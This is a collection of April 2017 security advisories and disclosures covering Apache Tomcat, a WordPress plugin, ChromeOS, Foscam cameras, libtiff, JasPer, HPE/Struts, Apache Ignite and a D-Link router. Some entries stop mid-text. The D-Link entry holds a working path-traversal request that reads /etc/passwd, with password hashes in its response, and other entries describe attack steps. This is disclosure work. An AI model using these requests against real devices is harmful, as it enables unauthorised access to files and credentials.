[SECURITY] CVE-2017-5648 Apache Tomcat Information Disclosure

[Mark Thomas]

CVE-2017-5648 Apache Tomcat Information Disclosure

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
Apache Tomcat 9.0.0.M1 to 9.0.0.M17
Apache Tomcat 8.5.0 to 8.5.11
Apache Tomcat 8.0.0.RC1 to 8.0.41
Apache Tomcat 7.0.0 to 7.0.75
Apache Tomcat 6.0.x is not affected

Description
While investigating bug 60718, it was noticed that some calls to
application listeners did not use the appropriate facade object. When
running an untrusted application under a SecurityManager, it was
therefore possible for that untrusted application to retain a reference
to the request or response object and thereby access and/or modify
information associated with another web application.

Mitigation:
Users of the affected versions should apply one of the following
mitigations:
- Upgrade to Apache Tomcat 9.0.0.M18 or later
- Upgrade to Apache Tomcat 8.5.12 or later
- Upgrade to Apache Tomcat 8.0.42 or later
- Upgrade to Apache Tomcat 7.0.76 or later

Credit:
This issue was identified by the Tomcat security team.

History:
2017-04-10 Original advisory

References:
[1] https://bz.apache.org/bugzilla/show_bug.cgi?id=60718
[2] http://tomcat.apache.org/security-9.html
[3] http://tomcat.apache.org/security-8.html
[4] http://tomcat.apache.org/security-7.html

[SECURITY] CVE-2017-5651 Apache Tomcat Information Disclosure

[Mark Thomas]

CVE-2017-5651 Apache Tomcat Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Apache Tomcat 9.0.0.M1 to 9.0.0.M18
Apache Tomcat 8.5.0 to 8.5.12
Apache Tomcat 8.0.x and earlier are not affected

Description:
The refactoring of the HTTP connectors for 8.5.x onwards, introduced a
regression in the send file processing. If the send file processing
completed quickly, it was possible for the Processor to be added to the
processor cache twice. This could result in the same Processor being
used for multiple requests which in turn could lead to unexpected errors
and/or response mix-up.

Mitigation:
Users of the affected versions should apply one of the following
mitigations:
- Upgrade to Apache Tomcat 9.0.0.M19 or later
- Upgrade to Apache Tomcat 8.5.13 or later

Credit:
This issue was reported publicly as Bug 60918 [1] and the security
implications identified by the Tomcat security team.

History:
2017-04-10 Original advisory

References:
[1] https://bz.apache.org/bugzilla/show_bug.cgi?id=60918
[2] http://tomcat.apache.org/security-9.html
[3] http://tomcat.apache.org/security-8.html

DefenseCode ThunderScan SAST Advisory: WordPress Tribulant Slideshow Gallery Plugin - Cross-Site Scripting Vulnerabilities

[DefenseCode]

   DefenseCode ThunderScan SAST Advisory
WordPress Tribulant Slideshow Gallery Plugin - Cross-Site Scripting
Vulnerabilities


Advisory ID: DC-2017-01-014
Software: WordPress Tribulant Slideshow Gallery plugin
Software Language: PHP
Version: 1.6.4 and below
Vendor Status: Vendor contacted, fix released
Release Date: 20170410
Risk: Medium


Full advisory available on the following URL:
http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf


# About DefenseCode

DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing,
WhiteBox Testing) solution for performing extensive security audits of
application sourcecode.
ThunderScan performs fast and accurate analyses of large and complex
source code projects delivering precise results and low false positive
rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing,
BlackBox Testing) solution for comprehensive security audits of active
web applications.
WebScanner will test a website's security by carrying out a large number
of attacks using the most advanced techniques, just as a real attacker
would.

Subscribe for free software trial on our website
http://www.defensecode.com/

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com/
Twitter: https://twitter.com/DefenseCode/

ChromeOS / ChromeBooks Persist Certain Network Settings in Guest Mode

[Nightwatch Cybersecurity Research]

[Original post can be found here:
https://wwws.nightwatchcybersecurity.com/2017/04/09/advisory-chromeos-chromebooks-persist-certain-network-settings-in-guest-mode/]

SUMMARY

Certain network settings in ChromeOS / ChromeBooks persists between
reboots when set in guest mode. These issues have been reported to the
vendor but will not be fixed since the vendor considers them to be WAI
(Working As Intended). These attacks require physical access to the
device in order to execute them but future avenues of research looking
at network vectors should be undertaken.

BACKGROUND

ChromeOS is the operating system developed by Google that runs on
ChromeBook devices. It is build on top of Linux and around the Chrome
browser. The OS has a guest mode which runs Chrome in anonymous mode
on top of a temporary guest account. The data within that account is
stored in RAM and is erased upon reboot. However, it appears from our
research that some settings, especially network related ones, reside
elsewhere and do persist between reboots.

Our original interest in this area was prompted by a standing $100,000
USD bounty offered by Google to an exploit “that can compromise a
Chromebook or Chromebox with device persistence in guest mode (i.e.
guest to guest persistence with interim reboot, delivered via a web
page)”. While we have not been able to deliver these attacks via a web
page, we did achieve some persistence in network settings in guest
mode via physical access. Further research is needed to achieve remote
exploitation.

DETAILS

The following network settings were observed in guest mode as
persisting between reboots if the change is made by a guest user while
the Chromebook is in guest mode:

- Details of WiFi network such as password, authentication, etc.
- Preferred WiFi network
- DNS settings on the currently connected WiFi network

To replicate, do the following:

1. Login as a guest into the Chromebook.
2. Click on settings, and:

- Try to remove a WiFi network and add a new preferred network;
- Or change settings for an existing network;
- Or change DNS servers for an existing network

3. Reboot, re-enter guest mode and observe settings persisting

The following settings only persist when changes are made on the login
screen. If a user logs in as a guest user or a Google account, this
goes away:

PROXY SETTINGS

To replicate:

1. Start the Chromebook until Login prompt appears. DO NOT login.
2. Click on settings, change the proxy settings in the current network.
3. Reboot and go back to the login screen, confirm settings for proxy
do persist.
4. Login to an existing account or as guest, check settings again and
observe that proxy settings are now greyed out.

Implications of this are most important in scenarios where a shared
Chromebook is used in a public environment such as a library, school,
etc. Using these attacks, a malicious user can modify the settings on
a public ChromeBook to point to malicious DNS (like DNS Changer virus)
or malicious WiFi hotspot, and subsequent users will not realize that
their sessions are affected.

We have not been able to achieve remote exploitation, but an existing
private Chrome API (chrome.networkingPrivate) would provide access to
these settings even in guest mode. This API is not normally available
via the Web, so an additional browser exploit would need to be chained
to the issues described here to achieve a complete exploit. Another
thing to note is that while guest mode normally runs under a RAM disk
which is erased after the device is rebooted, the network settings
appear to reside elsewhere within the device. That can be used as a
further area of possible attacks.

All testing was done in 2016 on the following system, and it is not
clear if other ChromeBook hardware is affected:

Device: Acer C7 Chromebook
Chrome Versions: 49.0.2623.95, 49.0.2623.111 and 51.0.2704.106 (stable)
ChromeOS Versions: 7834.60.0, 7834.66.0 and 8172.62.0 (stable parrot)

VENDOR RESPONSE

The vendor has rejected all of these issues as WAI – working as
intended. The vendor has provided the following explanation:

First of all, note that there are quite a few ways for network
settings to propagate into sessions. DNS and proxy (per issue 627299)
settings are just two of them. You can go further and just join the
device to a malicious WiFi network that it’ll pick up again after
rebooting (this is possible from the login screen, no need to start a
guest session). Edit: There are more issues filed for these cases, cf.
issue 600194 and issue 595563.

If we were to crack down on propagation of (malicious) network
settings into sessions, we’d take quite a UX hit, as we’d have to
prompt the user to reconfirm their network settings whenever the
device is connected to a network that user hasn’t yet approved (and
it’s quite unlikely for this to be effective). The alternative of only
allowing the device owner to configure networks doesn’t fly either as
it has the potential to lock out legitimate users.

Regardi

Foscam All networked devices, multiple Design Errors. SSL bypass.

[nick . m . mckenna]

Two issues in one that nullify SSL in foscam devices:
All Foscam networked cameras use the same SSL private key that is hard coded 
into the downloadable firmware. This is easily extracted using a utility like 
binwalk and would allow an attacker to MITM any Foscam device.
One devices SSL keys are valid for any other device. See the below certificates 
CNs: *.myfoscam.org

Below are the ssl certificates of two foscam devices.

 openssl s_client -connect [REDACTED]myfoscam.org:443

CONNECTED(0003)
depth=0 C = CN, ST = Guangdong, L = Shenzhen, O = "Shenzhen Foscam Intelligent 
Technology Co,Ltd", CN = *.myfoscam.org
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = CN, ST = Guangdong, L = Shenzhen, O = "Shenzhen Foscam Intelligent 
Technology Co,Ltd", CN = *.myfoscam.org
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
 0 s:/C=CN/ST=Guangdong/L=Shenzhen/O=Shenzhen Foscam Intelligent Technology 
Co,Ltd/CN=*.myfoscam.org
   i:/C=CN/O=WoSign CA Limited/CN=WoSign Class 3 OV Server CA
---
Server certificate
-BEGIN CERTIFICATE-
MIIFFDCCA/ygAwIBAgIQEMpzCCRnnDOkG7I+cxTlKTANBgkqhkiG9w0BAQUFADBP
MQswCQYDVQQGEwJDTjEaMBgGA1UEChMRV29TaWduIENBIExpbWl0ZWQxJDAiBgNV
BAMTG1dvU2lnbiBDbGFzcyAzIE9WIFNlcnZlciBDQTAeFw0xNTA0MDcwODIwMDda
Fw0xNjEyMDcwOTIwMDdaMIGFMQswCQYDVQQGEwJDTjESMBAGA1UECAwJR3Vhbmdk
b25nMREwDwYDVQQHDAhTaGVuemhlbjE2MDQGA1UECgwtU2hlbnpoZW4gRm9zY2Ft
IEludGVsbGlnZW50IFRlY2hub2xvZ3kgQ28sTHRkMRcwFQYDVQQDDA4qLm15Zm9z
Y2FtLm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK8H1eeluYBP
7x/7DLKPGneAnI9LWdMYbo+dIQKsyxQXRPOL+eWpQ/aWm/TAy0i4eDxmE0F7HmEn
Y/m3Prl7TweSvFYcthDn77bJTXjbdKdLPFxc34j/KC2AdaJOJzGVJfmPuSVk2NW+
mQyZxFuMU0X8M88+HwPX7leADUAjNdNIGcw4BG9xCrTY/6N/tk9an5iOHc+WKRQm
P6S+2xCSHIUETpbPlpbRnk+FYDP8KLqdLwTgECIYEfsefNdasACyQ9EafWF1C683
iuMAxtRe+mghklQoWYeslA6FhDcIZilPPkgnWjjqIkkAn+ik1q521aI3fUz/iGfM
ugsGMuBmck0CAwEAAaOCAbMwggGvMAsGA1UdDwQEAwIFoDAdBgNVHSUEFjAUBggr
BgEFBQcDAgYIKwYBBQUHAwEwCQYDVR0TBAIwADAdBgNVHQ4EFgQUYf1ztHxahhue
DsBxwaJJhZHpTAIwHwYDVR0jBBgwFoAUYi6B2eNCeRSjzdlUim743pWqj5gwfwYI
KwYBBQUHAQEEczBxMDUGCCsGAQUFBzABhilodHRwOi8vb2NzcDEud29zaWduLmNv
bS9jbGFzczMvc2VydmVyL2NhMTA4BggrBgEFBQcwAoYsaHR0cDovL2FpYTEud29z
aWduLmNvbS9jbGFzczMuc2VydmVyLmNhMS5jZXIwOQYDVR0fBDIwMDAuoCygKoYo
aHR0cDovL2NybHMxLndvc2lnbi5jb20vY2ExLXNlcnZlci0zLmNybDAnBgNVHREE
IDAegg4qLm15Zm9zY2FtLm9yZ4IMbXlmb3NjYW0ub3JnMFEGA1UdIARKMEgwCAYG
Z4EMAQICMDwGDSsGAQQBgptRAQMCAQIwKzApBggrBgEFBQcCARYdaHR0cDovL3d3
dy53b3NpZ24uY29tL3BvbGljeS8wDQYJKoZIhvcNAQEFBQADggEBAFSLG5spzqWY
qzZmHTYvNPwFSF6AD1VXksIaqKvrj4x4tOR5JQz3JBpgHpchaxQlv0VxA12lmGRY
kkF7vK48yVwlZkV6+ScYiK2PAVxpyJqqA42cv0vbna+cgoSbw5zz6/VjWdiAlqbl
lS5Su2FsVuPJBEIbRXQshRJycmxG9JqKOWQRSNvxdO59EHyYSmo+avNLzGl218R4
FeF4fEP4/QHmOPNzrDMFzfXFdlsO3T3WeXcmgeSyNGev9d6EwhP+LRJsawpVdRAq
f1sqtSGbqN3iGQrEQeGMCDAE+U7nzTTCWBcFXg8O5077kiB/MZtx2kDpZf2p3qqt
OVAbevhaNsE=
-END CERTIFICATE-
subject=/C=CN/ST=Guangdong/L=Shenzhen/O=Shenzhen Foscam Intelligent Technology 
Co,Ltd/CN=*.myfoscam.org
issuer=/C=CN/O=WoSign CA Limited/CN=WoSign Class 3 OV Server CA

openssl s_client -connect [REDACTED]myfoscam.org:443


CONNECTED(0003)

depth=0 C = CN, ST = Guangdong, L = Shenzhen, O = "Shenzhen Foscam Intelligent 
Technology Co,Ltd", CN = *.myfoscam.org
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = CN, ST = Guangdong, L = Shenzhen, O = "Shenzhen Foscam Intelligent 
Technology Co,Ltd", CN = *.myfoscam.org
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
 0 s:/C=CN/ST=Guangdong/L=Shenzhen/O=Shenzhen Foscam Intelligent Technology 
Co,Ltd/CN=*.myfoscam.org
   i:/C=CN/O=WoSign CA Limited/CN=WoSign Class 3 OV Server CA
---
Server certificate
-BEGIN CERTIFICATE-
MIIFFDCCA/ygAwIBAgIQEMpzCCRnnDOkG7I+cxTlKTANBgkqhkiG9w0BAQUFADBP
MQswCQYDVQQGEwJDTjEaMBgGA1UEChMRV29TaWduIENBIExpbWl0ZWQxJDAiBgNV
BAMTG1dvU2lnbiBDbGFzcyAzIE9WIFNlcnZlciBDQTAeFw0xNTA0MDcwODIwMDda
Fw0xNjEyMDcwOTIwMDdaMIGFMQswCQYDVQQGEwJDTjESMBAGA1UECAwJR3Vhbmdk
b25nMREwDwYDVQQHDAhTaGVuemhlbjE2MDQGA1UECgwtU2hlbnpoZW4gRm9zY2Ft
IEludGVsbGlnZW50IFRlY2hub2xvZ3kgQ28sTHRkMRcwFQYDVQQDDA4qLm15Zm9z
Y2FtLm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK8H1eeluYBP
7x/7DLKPGneAnI9LWdMYbo+dIQKsyxQXRPOL+eWpQ/aWm/TAy0i4eDxmE0F7HmEn
Y/m3Prl7TweSvFYcthDn77bJTXjbdKdLPFxc34j/KC2AdaJOJzGVJfmPuSVk2NW+
mQyZxFuMU0X8M88+HwPX7leADUAjNdNIGcw4BG9xCrTY/6N/tk9an5iOHc+WKRQm
P6S+2xCSHIUETpbPlpbRnk+FYDP8KLqdLwTgECIYEfsefNdasACyQ9EafWF1C683
iuMAxtRe+mghklQoWYeslA6FhDcIZilPPkgnWjjqIkkAn+ik1q521aI3fUz/iGfM
ugsGMuBmck0CAwEAAaOCAbMwggGvMAsGA1UdDwQEAwIFoDAdBgNVHSUEFjAUBggr
BgEFBQcDAgYIKwYBBQUHAwEwCQYDVR0TBAIwADAdBgNVHQ4EFgQUYf1ztHxahhue
DsBxwaJJhZHpTAIwHwYDVR0jBBgwFoAUYi6B2eNCeRSjzdlUim743pWqj5gwfwYI
KwYBBQUHAQEEczBxMDUGCCsGAQUFBzABhilodHRwOi8vb2NzcDEud29zaWduLmNv
bS9jbGFzczMvc2VydmVyL2NhMTA4BggrBgEFBQcwAoYsaHR0cDovL2FpYTEud29z
aWduLmNvbS9jbGFzczMuc2VydmVyLmNhMS5jZXIwOQYDVR0fBDIwMDAuoCygKoYo
aHR0cDovL2NybHMxLndvc2lnbi5jb

[slackware-security] libtiff (SSA:2017-098-01)

[Slackware Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  libtiff (SSA:2017-098-01)

New libtiff packages are available for Slackware 14.2 and -current to
fix security issues.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/libtiff-4.0.7-i586-1_slack14.2.txz:  Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9448
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libtiff-4.0.7-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libtiff-4.0.7-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libtiff-4.0.7-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libtiff-4.0.7-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.2 package:
a0b2f84a88036a4e8e01165d522fdf09  libtiff-4.0.7-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
fccecb6c9e1eea06607442bd6b58e63f  libtiff-4.0.7-x86_64-1_slack14.2.txz

Slackware -current package:
a1699ec0db14b6563390f78f9c9bee8e  l/libtiff-4.0.7-i586-1.txz

Slackware x86_64 -current package:
9e5280389d6fc4a80fb0c42a026a942c  l/libtiff-4.0.7-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg libtiff-4.0.7-i586-1_slack14.2.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-

iEYEARECAAYFAljpEdwACgkQakRjwEAQIjPSBgCfaFEyDjWCG7sns5wbvi0/nznJ
4ZAAmQGyc3WOMxa5T/ukCXO7dszGQUkG
=XkDp
-END PGP SIGNATURE-

[SECURITY] [DSA 3827-1] jasper security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3827-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
April 07, 2017https://www.debian.org/security/faq
- -

Package: jasper
CVE ID : CVE-2016-9591 CVE-2016-10249 CVE-2016-10251

Multiple vulnerabilities have been discovered in the JasPer library for
processing JPEG-2000 images, which may result in denial of service or
the execution of arbitrary code if a malformed image is processed.

For the stable distribution (jessie), these problems have been fixed in
version 1.900.1-debian1-2.4+deb8u3.

We recommend that you upgrade your jasper packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAljn9woACgkQEMKTtsN8
TjaZTRAAv0TDH4nPWpPFg02lmxIgpM0aOOoOhkbBznG3JBPJew5v55+vNr8FXV35
hBPC0AOCQdZ4FeCb9+mQBdEw0+TOhh83T1q9OMfG/PASXU1XG7r0h3oy75R3EyFP
oebkuwmFgmvyG/LtOSCoZIzUS3uWZmSXRrI5+4bX+e4Fht2LzPNzifYANte+cntq
exEUO2yypilLYFIbWQtBsXkpmkcAqQb/bffssF/vsncYTdZGaDDiYqZ2KNzQICcb
7y2J0v0QxC7G9ZYZwpazYkspc+rwmuErGa55/O6Q6qSiZvC0QZ+yluumf/OOPJim
bDZooYj84ALNG3RqThoriIa1iSGy5JcDzBwKsBfCtIsb2GVI++4ZudgtRiZzQexR
kZDeIaYEG/PtYXVmKy9U/yTEnS8Zl5PQDAYer1cOrOJtpEimlRNy2pOSB7bz/Efe
JBRoiiwXyz7296jHlyu/JnyB1FmHHQTTNg6vq7C7MIDsDyVPOXSk1Kdb03FBDM8Q
3GXajgkd7nF7e5BRflBdtMS43sFyHLL+JeX8iECQU88CmppaJY4QKRKk2hffLlCt
oN8XEagrqYDan1E6ElG/8fwhksFrW1BrRZImsZ1otOA674NtfVYILgTgCK5LWRZ3
ay4RKGaw4RTBT0b27ff1QdsHvFMmn6Zpy1BNTU9PSklhYTchdEI=
=b92d
-END PGP SIGNATURE-

[security bulletin] HPESBGN03733 rev.1 - HPE Universal CMDB using Apache Struts, Remote Code Execution

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbgn03733en_us
Version: 1

HPESBGN03733 rev.1 - HPE Universal CMDB using Apache Struts, Remote Code
Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2017-04-07
Last Updated: 2017-04-07

Potential Security Impact: Remote: Code Execution

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability in Jakarta Multipart parser in Apache
Struts has been addressed in HPE Universal CMDB. This vulnerability could be
remotely exploited to allow code execution via mishandled file upload.

References:

  - CVE-2017-5638 - Vulnerability in Apache Struts 2, Remote Code Execution

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HP Universal CMDB Foundation Software - v10.22 CUP5

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2017-5638
  10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following mitigation information available to resolve the
vulnerability for the impacted versions of HPE Universal CMDB.

*


HISTORY
Version:1 (rev.1) - 7 April 2017 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCAAGBQJY58khAAoJELXhAxt7SZair4cH/28pTPF/Zd2+2pMHo1+zunk9
XsoYuewIRE3X81eJsyHdGedEvQIPFZAzpXtvSU78LGBU7afbEDSFunpyfe4Xu/op
SwTH1N4d+F9r25vsVQkiS7sA5mCAdybRmBGzf29cWeO8pImwe5YTsY2uG3wC8Ljm
EHCQVjmIC9UmnXs9FEzc8wRyDI969hOsicGnTNlY7KJxlNL6a5rqmRJRhXezH4N+
3OS1TVEvlwlGcQtHZ3C1Lb2xzmMSypRkm7Ev7u3KpsnkWjH6PTvR9fVMrwpjxqwD
0pr/r53EsK+wktSdpbWFflu2QCqxJaaWEeEuiFdJTu4Eicnd4CQRjhNvSSXs2+0=
=9S2v
-END PGP SIGNATURE-

[CVE-2016-6805] Arbitrary File Read due to eXternal Xml Entity attack in Apache Ignite

[Denis Magda]

[CVE-2016-6805] Arbitrary File Read due to eXternal Xml Entity attack in Apache 
Ignite

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected: Apache Ignite 1.0.0-RC3 to 1.8

Description:
Apache Ignite uses an update notifier component to update the users about new 
project releases that include additional functionality, bug fixes and 
performance improvements. To do that the component communicates to an external 
PHP server (http://ignite.run) where it needs to send some system properties 
like Apache Ignite or Java version. This feature is enabled by default and used 
to send sensitive data over HTTP by mistake, such as installation folders or 
environment variables stored in Java system properties. The second issue is 
because TLS is not used between the application and the PHP server, a 
Man-in-the-middle attack is possible and a malicious actor could alter the 
response coming from the ignite.run server. This response is parsed by the 
Apache ignite component as XML, and a XXE attack can be triggered.

Both issues mentioned above were fixed as a part of Apache Ignite 1.9 release. 
The relevant commits with the changes:

Mitigation:
Users must upgrade to Apache Ignite 1.9 or later versions or disable the update 
notifier.

Credit:
Pierre Ernst, Salesforce

D-Link DWR-116 - CVE-2017-6190 - Arbitrary File Download

[patrykgnt]

# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)

Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability
which leads to unathorized file download from device filesystem.


PoC:

HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; 
Trident/5.0)
Connection: close

HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close

root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin


Fix:
Update device to the new firmware (V1.05b09)